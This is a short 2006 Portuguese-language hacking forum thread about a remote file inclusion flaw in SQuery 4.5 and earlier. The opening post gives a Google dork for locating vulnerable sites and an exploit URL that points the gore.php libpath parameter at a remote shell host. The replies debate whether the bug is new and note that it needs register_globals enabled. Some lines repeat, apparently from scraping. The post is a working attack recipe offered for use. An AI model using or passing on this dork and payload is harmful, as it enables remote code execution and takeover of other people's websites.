Title: SQuery <= 4.5(libpath) Remote File Inclusion
Post by: Anonymous on 11 de July , 2006, 04:16:52 AM
Post by: Anonymous on 11 de July , 2006, 04:16:52 AM
Trabalhado : Todas versões
Level Crítico : Perigoso
Bug encontrado em : gore.php
=================================================================
Encontra-se : "SQuery 4.5" |"SQuery 4.0" |"SQuery 3.9" |
inurl:"modules.php?name=SQuery"
http://sitename.com/SQuery/lib/gore.php?libpath=http://SHELLURL.COM? (//http://sitename.com/SQuery/lib/gore.php?libpath=http://SHELLURL.COM?)
Autor:SHiKaA
Level Crítico : Perigoso
Bug encontrado em : gore.php
=================================================================
Encontra-se : "SQuery 4.5" |"SQuery 4.0" |"SQuery 3.9" |
inurl:"modules.php?name=SQuery"
http://sitename.com/SQuery/lib/gore.php?libpath=http://SHELLURL.COM? (//http://sitename.com/SQuery/lib/gore.php?libpath=http://SHELLURL.COM?)
Autor:SHiKaA
Title: Re: SQuery <= 4.5(libpath) Remote File Inclusion
Post by: Wuefez on 12 de July , 2006, 12:31:48 AM
Post by: Wuefez on 12 de July , 2006, 12:31:48 AM
po cara ja tem uns 3 meses que saiu isso ai
e como não são muitos sites que usam o SQuery não da pra catar mais nada não...
e como não são muitos sites que usam o SQuery não da pra catar mais nada não...
Title: Re: SQuery <= 4.5(libpath) Remote File Inclusion
Post by: HadeS on 12 de July , 2006, 09:21:11 AM
Post by: HadeS on 12 de July , 2006, 09:21:11 AM
Wuefez, pelo que eu saiba essa falha é nova.
Acho que uns dois dias atrás.
HadeS
Acho que uns dois dias atrás.
HadeS
Title: Re: SQuery <= 4.5(libpath) Remote File Inclusion
Post by: slul on 13 de July , 2006, 01:44:28 AM
Post by: slul on 13 de July , 2006, 01:44:28 AM
sim a falha eh nova mas soh pega servidores que tem o register_globals habilitado 1 em 100.000 
e como nao tem 100.000 sites q usem o SQuey
logo:
A falha nao eh utilizavel
e como nao tem 100.000 sites q usem o SQuey
logo:
A falha nao eh utilizavel